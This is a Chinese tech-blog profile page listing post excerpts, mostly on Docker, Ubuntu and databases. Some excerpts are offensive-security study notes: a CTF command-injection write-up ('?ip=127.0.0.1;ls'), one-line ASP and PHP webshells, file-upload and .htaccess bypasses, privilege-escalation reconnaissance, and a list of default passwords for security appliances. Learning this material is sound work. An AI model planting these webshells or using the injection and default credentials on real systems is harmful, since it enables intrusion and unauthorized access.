- 博客(63)
- 资源 (4)
- 收藏
- 关注
RSS订阅
转载 GraphQL 在微服务架构中的实践
GraphQL类型系统集中式 vs 分散式Relay 标准对象标识符连接与分页可变请求小结N + 1 问题 微服务架构Schema 设计前缀粘合组合小结认证与授权认证授权小结路由设计 架构的演进中心化 Schema 与 RPC去中心化管理的 Schema服务网格与 RPC总结Reference在...
2018-08-24 10:45:49
1252
原创 docker下运行kalilinux并配置ssh访问
Kali Linux是一款开源的基于Debian的渗透测试专用操作系统,系统中包含一系列用于渗透测试的神器。 Docker是目前最火热的开源应用容器,发布于2014年6月。它能让开发者打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。Docker+KaliKali系统开发者Mati Aharoni认为:将Docker与Kali结合的...
2018-08-10 03:31:07
3559
1
原创 Ubuntu 更换国内源
Ubuntu系统自带的源都是国外的网址,下载非常慢,所以将国外源更换为国内源备份原来的源sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak更换源sudo gedit /etc/apt/sources.list使用gedit打开文档,将下边的阿里源复制进去,然后点击保存关闭。阿里源deb ht...
2018-08-07 15:59:12
556
1
原创 WgpSecCTF刷题
WgpSecCTF刷题小心我PING死你解题思路:PHP命令执行与绕过/?ip=127.0.0.1;ls通过GET方式提交常见Linux命令发现ls、cat、空格等均被过滤通过dir发现目录下存在flag.php与index.php利用less、more、tac等替代cat,查看index.php代码如下:?> } print_r($a); echo ""; $a = shell_exec("ping -c 4 ".$ip); } die("you cant ge
2022-01-06 12:02:55
826
原创 [等保技术]LINUX服务器整改——日志安全存储180天
引用《网络安全法》:第三章 网络运行安全 第一节 一般规定 第二十一条国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或者被窃取、篡改:(一)制定内部安全管理制度和操作规程,确定网络安全负责人,落实网络安全保护责任;(二)采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施;(三)采取监测、记录网络运行状态、网络安全事件的技术措施,并按照规定留存相关的网络日志不少于六个月;
2021-10-22 14:22:15
1796
原创 一次很折腾的扩容,记录一下之后再整理
一次很折腾的扩容,记录一下之后再整理`[root@localhost ~]# fdisk -lDisk /dev/sda: 50.3 GB, 50331648000 bytes, 98304000 sectorsUnits = sectors of 1 * 512 = 512 bytesSector size (logical/physical): 512 bytes / 512 bytesI/O size (minimum/optimal): 512 bytes / 512 bytesDisk
2021-02-24 10:43:24
810
原创 【Shiro_exploit】PYTHON报错解决:ModuleNotFoundError: No module named 'requests'
在复现Apache Shiro 漏洞时,发现自己的python环境各种报错,值得注意的就是如下:Traceback (most recent call last): File "shiro_exploit.py", line 7, in <module> import requestsModuleNotFoundError: No module named 'requ...
2020-05-05 01:23:13
420
原创 ctfhub 投稿彩蛋
flag[0:6] = ctfhubflag[6:12] = "{029e0"flag[12:18] = "2eb3a1"ZmxhZyU1QjE4JTNBMjQlNUQlMjAlM0QlMjAlMjJlOGM0OWIlMjI=flag[18:24] = "e8c49b"666c61675b32343a33305d203d202231313332623522flag[24:30] = "...
2020-04-14 22:16:12
602
原创 第三周任务,利用文件上传漏洞
0x00 前言本周主要学习了文件上传各种姿势,掌握了常见的黑白名单后缀绕过、文件内容检查绕过的原理、实现及简单防护。0X01 文件上传校验姿势o 客户端javascript校验(一般只校验后缀名)o 服务端校验o 文件头content-type字段校验(image/gif)o 文件内容头校验(GIF89a)o 后缀名黑名单校验o 后缀名白名单校验o 自定义正则校验1.1 客户端...
2020-04-12 10:36:18
219
原创 CentOS 8安装Docker报错(Problem: package docker-ce-3:19.03.8-3.el7.x86_64 requires containerd.io >= 1.2.)
CentOS8安装docker和docer-conpose,报错 Problem: package docker-ce-3:19.03.8-3.el7.x86_64 requires containerd.io >= 1.2.2-3, but none of the providers can be installed不废话,直接上步骤1、yum更新yum update2、安装依...
2020-03-30 00:44:21
9214
5
转载 常见网络安全设备默认口令
[转]安全设备常见网络安全设备默认口令设备默认账号默认密码深信服产品sangforsangforsangforsangfor@2018sangforsangfor@2019深信服科技ADdlanrecover深信服负载均衡 AD 3.6adminadmin深信服WAC ( WNS V2.6)adminadmin深信...
2020-03-14 18:10:10
3767
原创 文件上传漏洞之.htaccess
0x00 前言.htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htacce...
2020-03-12 21:00:46
2881
1
原创 一句话##错误 'ASP 0116' 丢失脚本关闭分隔符
可以突破Script 块缺少脚本关闭标记的一句话asp一句话<%execute(request(“NC”))%>"%><%execute(request(“NC”))%><%’php一句话<?php eval($_POST[NC]);?>aspx一句话<% @Page Language=“Jscript”%><%eva...
2020-03-07 18:25:59
356
原创 ERROR 2002 (HY000): Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’
故障描述:启动mysql 报错:ERROR 2002 (HY000): Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’ (2)1.先查看mysql启动状态#/etc/rc.d/init.d/mysqld status2.mysql.sock位置查找与验证?# find / -na...
2018-10-08 15:38:57
440
原创 《爱情之死》有感
我醒来是因为钟点女工开始在客厅用吸尘机。 我用手揉揉眼睛,整个额头是酸痛的。电视又开始操作,昨夜忘记关吧。 一切都不重要。 我赤脚走到厨房去取牛奶喝,坐在万脚椅子上想。 我能做什么呢。 我一定会跟俊东离婚。不离也没有用,他要离开我,他已三天没回来了。我必须要接受一个事实,他已经不再爱我。 我取过镇静剂吞一枚,我的一日又开始沉闷。 我不想住在这间房子里,回...
2018-08-19 05:41:02
339
原创 Access、Hybrid和Trunk三种模式的理解
以太网端口的三种链路类型:Access、Hybrid和TrunkAccess类型的端口只能属于1个VLAN,一般用于连接计算机的端口; Trunk类型的端口可以允许多个VLAN通过,可以接收和发送多个VLAN的报文,一般用于交换机之间连接的端口; Hybrid类型的端口可以允许多个VLAN通过,可以接收和发送多个VLAN的报文,可以用于交换机之间连接,也可以用于连接用户的计算机。Hyb...
2018-08-17 10:10:34
1886
原创 Ubuntu终端Terminal常用快捷键
快捷键|功能 ———|—— Tab 自|动补全 Ctrl+a |光标移动到开始位置 Ctrl+e |光标移动到最末尾 Ctrl+k |删除此处至末尾的所有内容 Ctrl+u|删除此处至开始的所有内容 Ctrl+d |删除当前字符 Ctrl+h|删除当前字符前一个字符 Ctrl+w |删除此处到左边的单词 Ctrl+y |粘贴由 Ctrl+u , Ctrl+d ...
2018-08-17 09:43:12
141
原创 CSDN-markdown编辑器
Markdown编辑器写博客Markdown和扩展Markdown简洁的语法代码块高亮图片链接和图片上传LaTex数学公式UML序列图和流程图离线写博客导入导出Markdown文件丰富的快捷键快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl + Q插入链接 Ctrl + L插入代码 Ctrl + K插入...
2018-08-17 09:36:53
89
原创 ubuntu安装重启时显卡问题报错: BUG soft lockup 的解决办法
安装 Ubuntu 出现 BUG soft lockup 的解决办法(18.04):具体的错误内容: kernel:NMI watchdog: BUG: soft lockup - CPU#0 stuck for 26s想具体了解这条错误的内容,请参考此链接: https://www.cnblogs.com/vmtauto/p/7427913.html出现这条信息说明 : CUP 过度...
2018-08-15 10:19:59
2675
1
原创 postgres基本操作(个人总结版)
postgres 基本操作登录$ psql (连接数据库,默认用户和数据库都是postgres)$ psql -U &lt;user&gt; -d &lt;dbname&gt; 数据库操作// 列举数据库,相当于show databases “` $ \l // 切换数据库,相当与use dbname$ \c // 列举表,相当与show tables$ \...
2018-08-14 16:59:14
22233
1
翻译 使用 Docker 容器应该避免的 10 个事情
当你最后投入容器的怀抱,发现它能解决很多问题,而且还具有众多的优点:第一:它是不可变的 – 操作系统,库版本,配置,文件夹和应用都是一样的。您可以使用通过相同QA测试的镜像,使产品具有相同的表现。 第二:它是轻量级的 – 容器的内存占用非常小。不需要几百几千MB,它只要对主进程分配内存再加上几十MB。 第三:它很快速 – 启动一个容器与启动一个单进程一样快。不需要几分钟,您可以在几秒钟内启...
2018-08-10 04:52:19
276
原创 华为路由器交换机配置命令
华为路由器交换机配置命令:计算机命令 PCAlogin:root ##使用root用户 password:linux ##口令是linux #shutdown-hnow ##关机 #init0 ##关机 #logout ##用户注销 #login ##用户登录 #ifconfig ##显示IP地址 #ifconfigeth0netmask ##设置IP地址 #...
2018-08-08 12:41:16
572
原创 Ubuntu 16.04卸载PostgresQL
netstat -nlt ##查看postgresql进程是否仍在运行sudo service postgresql stop ##暂停服务sudo apt-get --purge remove postgresql ##卸载及删除安装包删除对应的配置sudo rm -r /etc/postgresql/sudo rm -r /etc/postgresql-common/s...
2018-08-08 12:28:06
1024
转载 通过 三大机制 揭秘 IPFS 工作原理
一 repo1 什么是repo?我们知道,ipfs启动之前需要先运行ipfs init初始化,什么意思?就是生成该程序的配置信息和初始的数据库,就像一个商店要开张迎业,先要把商店盖好,货物提前采购好,那这些初始化的数据放置在哪里呢?位于每个用户的家目录下.ipfs目录下,如下图(我是以ec2-user用户的身份登录的):[ec2-user@ip-172-31-23-215 ~]$ pw...
2018-08-08 04:56:11
2314
原创 Ubuntu16.04下Docker pull connection refused 解决办法
检查Ubuntu是否设置了DNS,确保解析正常Ubuntu DNS配置方法interfaces方式 修改/etc/network/interfaces,配置DNS需要在该文件中加入dns-nameserver xx.xx.xx.xxdns-nameserver xxx.xxx.xx.xxdns-nameservers xxx.xxx.xxx.xxx xxx.xxx.xx.xxx...
2018-08-07 16:16:30
4979
1
原创 Ubuntu 16.04开机隐藏菜单缩短时间
sudo vim /etc/grub.d/30_os-prober 隐藏菜单缩短时间, 将其中的adjust_timeout函数中 timeout_style=menu改为timeout_style=hidden 如果想显示倒计时, timeout_style=menu改为timeout_style=ountdown set timeout=10改为set timeout=1 ...
2018-08-06 15:54:22
3566
原创 Ubuntu 16.04开机A start job is running for Raise network interface(5min 4s)解决方法
进入系统后修改文件/etc/systemd/system/network-online.target.wants/networking.servicesudo vim /etc/systemd/system/network-online.target.wants/networking.service将里面的TimeoutStartSec=5min 修改为TimeoutStartSec=2...
2018-08-06 15:08:35
7943
1
转载 Linux提权获取敏感信息方法
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。...
2018-08-03 15:47:02
321
原创 docker下删除none的images
脚本#!/bin/bashdocker ps -a | grep "Exited" | awk '{print $1 }'|xargs docker stopdocker ps -a | grep "Exited" | awk '{print $1 }'|xargs docker rmdocker images|grep none|awk '{print $3 }'|xargs dock...
2018-08-01 17:04:21
744
原创 安装 docker-compose (实测可用,妈妈再也不用担心被墙了)
安装 Docker Compose# 你可以通过修改URL中的版本,可以自定义您的需要的版本curl -L https://get.daocloud.io/docker/compose/releases/download/1.21.2/docker-compose-`uname -s`-`uname -m` &gt; /usr/local/bin/docker-compose# 为安...
2018-08-01 16:58:54
1688
原创 docker上传镜像至Registry时https报错解决方法
[root@vir-56 ~]# docker push 27.26.160.255:5000/test56/httpd:1.1.1报错如下: The push refers to a repository [27.26.160.255:5000/test56/httpd] Get https://27.26.160.255:5000/v1/_ping: http: server ga...
2018-07-31 15:26:07
3455
原创 CentOS 下 tree命令用法详解
当需要生成目录树结构时会用到TREE命令:yum install tree关于TREE命令的一些参数:tree -a 显示所有 tree -d 仅显示目录 tree -L n n代表数字..表示要显示几层… tree -f 显示完整路径..tree也支持重定向至文件 tree -L 4 &gt;dirce.doc即可生成UTF8格式的文档..我们也可以在windows 下查...
2018-07-31 09:19:34
1174
原创 docker更换国内镜像
在国内访问 Docker 官方的镜像,一直以来速度都慢如蜗牛。为了快速访问 Docker 官方镜像都会配置三方加速器,目前常用三方加速器有:网易、USTC、DaoCloud、阿里云。现在 Docker 官方针对中国区推出了镜像加速服务。通过 Docker 官方镜像加速,国内用户能够以更快的下载速度和更强的稳定性访问最流行的 Docker 镜像。如何使用官方镜像Docker 中国官方...
2018-07-31 03:23:14
1022
转载 【IPFS指南】IPFS的竞争对手们(一)
IPFS这个项目真的开发很慢,相比其它区块链项目,IPFS的进度可真是让小编捉急,恨铁不成钢啊。然而小编仍然对他们充满信心,来,借用一句盗梦空间里的经典台词: 今天来讲讲现有的跟IPFS类似的区块链项目,下面简单介绍一下,其他项目目前的情况,如果有感兴趣的同学也可以参与一下试试,就当是给IPFS做个预热1 Storj基本情况:官方网站:https://storj.io/白皮书...
2018-07-22 18:11:34
481
原创 信安入门神级书单
《社会工程:安全体系中的人性漏洞》 《Android应用安全防护和逆向分析》 《逆向工程核心原理》 《Metasploit渗透测试魔鬼训练营》 《鸟哥linux的私房菜》(第三版) 《Linux二进制分析》 《网络空间安全实战基础》 《Python绝技:运用Python成为顶级黑客》 《白帽子讲web安全》 《web前端黑客技术解密》...
2018-07-22 03:50:13
410
原创 两个好用的命令行工具 watch 和 rsync
watch有监控的需求,比如文件列表的变化等。# -5 指的是间隔5s执行一次# --differences 指高亮变化的地方watch -n 5 --differences ls -lrsync不多说了,主要解决了我在服务器之间的大文件同步需求,scp本来也能做,但是如果文件名相同会直接覆盖。# --update 不覆盖更新的文件# --times 选项保持每个文件的访问权...
2018-07-22 03:47:30
1129
原创 windows 下 netsh 实现 端口映射(端口转发)
haproxy主要用于负载,如果只是负载一个,那就成为端口映射了,但是毕竟是linux下面的程序。windows下也有一个小工具:portforward.exe,图形界面容易操作,个人平常使用可以,但是也没有办法实现与程序交互。经过在网上搜索,发现windows系统,包括xp 2003,2008等,netsh工具都自带portproxy功能。目前只支持tcp协议的端口转发,前提需要作为po...
2018-07-22 03:38:53
2098
原创 非插件实现Typecho语法高亮
具体的方法是通过prism.js而不是PHP代码来实现语法高亮。直接百度找到prism.js的官网,进入下载页面。在下载页面中选中你想要实现语法高亮的语言。下载js文件(prism.js)和css文件(prism.css)将下载的js和css文件上传到Typecho的主题目录,即“usr/themes/主题名”目录下。登陆进入Typecho的后台,点击“控制台” ->...
2018-07-22 03:24:26
2400
原创 非插件实现cookie版Typecho文章阅读次数统计功能
直接在typecho主题中添加函数代码实现,加入cookie验证,重复刷新页面也只会增加一次阅读次数。 在当前使用的typecho主题的functions.php文件中添加以下代码:function get_post_view($archive){ $cid = $archive-&gt;cid; $db = Typecho_Db::get(); $...
2018-07-22 02:50:50
609
1
原创 一行代码更改密码
输入两次密码这种交互适合终端操作,而不是适用于脚本操作。方法一:管道echo 'root:woaibeijingtiananmen' | chpasswd//此方法使用于需要输入两次密码的情况(echo 'password'; echo 'password') | pure-pw useradd www -u www-data -d /home/ftpuser/www...
2018-07-22 02:48:08
363
DoraBox 漏洞练习平台WriteUP.pdf
2020-04-14
Marp.exe 用Markdown 写一个极客范儿的PPT
2018-08-08
硬盘检测工具HD破解版
2018-07-19
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人